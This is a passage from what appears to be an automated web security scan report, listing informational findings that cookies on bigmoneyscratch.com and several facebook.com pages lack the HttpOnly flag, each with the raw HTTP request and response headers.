Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.214. http://www.bigmoneyscratch.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:43 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47183


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.215. http://www.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.216. http://www.bigmoneyscratch.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:01 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.217. http://www.bigmoneyscratch.com/Mobile.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Mobile.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Mobile.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87772


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.218. http://www.bigmoneyscratch.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:28 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55152


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.219. http://www.bigmoneyscratch.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Promotions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:04:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:04:03 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49441


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.220. http://www.bigmoneyscratch.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:11 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 52839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.221. http://www.bigmoneyscratch.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:08 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.222. http://www.bigmoneyscratch.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.223. http://www.bigmoneyscratch.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bigmoneyscratch.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.224. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

12.225. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.226. http://www.facebook.com/WinningsCom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WinningsCom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

12.227. http://www.facebook.com/crazyscratch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crazyscratch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

12.228. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/BigMoneyScratch/156518521055171

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTQnBh8OpqRjSzWcXKlvK; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=7uzqb; path=/; domain=.facebook.com
